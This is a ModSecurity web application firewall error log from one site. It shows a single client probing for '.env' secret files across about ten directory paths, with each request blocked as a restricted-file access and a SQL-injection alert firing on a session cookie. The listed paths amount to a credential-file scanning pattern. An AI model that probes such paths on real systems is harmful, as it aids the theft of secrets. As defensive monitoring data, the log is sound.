[Mon May 11 16:33:29.401454 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/frontend/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KgAAAQs"]
[Mon May 11 16:33:29.401832 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/frontend/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KgAAAQs"]
[Mon May 11 16:33:29.402018 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/frontend/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KgAAAQs"]
[Mon May 11 16:33:29.402277 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/frontend/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KgAAAQs"]
[Mon May 11 16:33:29.558460 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/src/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KwAAAQs"]
[Mon May 11 16:33:29.558849 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/src/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KwAAAQs"]
[Mon May 11 16:33:29.559034 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/src/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KwAAAQs"]
[Mon May 11 16:33:29.559291 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/src/.env"] [unique_id "agHouUWKUxpmnkK7zHx_KwAAAQs"]
[Mon May 11 16:33:29.718052 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/core/.env"] [unique_id "agHouUWKUxpmnkK7zHx_LAAAAQs"]
[Mon May 11 16:33:29.718442 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/core/.env"] [unique_id "agHouUWKUxpmnkK7zHx_LAAAAQs"]
[Mon May 11 16:33:29.718630 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/core/.env"] [unique_id "agHouUWKUxpmnkK7zHx_LAAAAQs"]
[Mon May 11 16:33:29.718873 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/core/.env"] [unique_id "agHouUWKUxpmnkK7zHx_LAAAAQs"]
[Mon May 11 16:33:29.875102 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/core/app/.env"] [unique_id "agHouUWKUxpmnkK7zHx_LgAAAQs"]
[Mon May 11 16:33:29.875495 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/core/app/.env"] [unique_id "agHouUWKUxpmnkK7zHx_LgAAAQs"]
[Mon May 11 16:33:29.875684 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/core/app/.env"] [unique_id "agHouUWKUxpmnkK7zHx_LgAAAQs"]
[Mon May 11 16:33:29.875934 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/core/app/.env"] [unique_id "agHouUWKUxpmnkK7zHx_LgAAAQs"]
[Mon May 11 16:33:30.032130 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/config/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MAAAAQs"]
[Mon May 11 16:33:30.032539 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/config/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MAAAAQs"]
[Mon May 11 16:33:30.032732 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/config/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MAAAAQs"]
[Mon May 11 16:33:30.032980 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/config/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MAAAAQs"]
[Mon May 11 16:33:30.189580 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/private/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MQAAAQs"]
[Mon May 11 16:33:30.189993 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/private/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MQAAAQs"]
[Mon May 11 16:33:30.190219 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/private/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MQAAAQs"]
[Mon May 11 16:33:30.190469 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/private/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MQAAAQs"]
[Mon May 11 16:33:30.348957 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/application/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MgAAAQs"]
[Mon May 11 16:33:30.349337 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/application/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MgAAAQs"]
[Mon May 11 16:33:30.349519 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/application/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MgAAAQs"]
[Mon May 11 16:33:30.349754 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/application/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MgAAAQs"]
[Mon May 11 16:33:30.506354 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/bootstrap/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MwAAAQs"]
[Mon May 11 16:33:30.506741 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/bootstrap/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MwAAAQs"]
[Mon May 11 16:33:30.506955 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/bootstrap/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MwAAAQs"]
[Mon May 11 16:33:30.507225 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/bootstrap/.env"] [unique_id "agHoukWKUxpmnkK7zHx_MwAAAQs"]
[Mon May 11 16:33:30.666730 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/database/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NAAAAQs"]
[Mon May 11 16:33:30.667133 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/database/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NAAAAQs"]
[Mon May 11 16:33:30.667365 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/database/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NAAAAQs"]
[Mon May 11 16:33:30.667611 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/database/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NAAAAQs"]
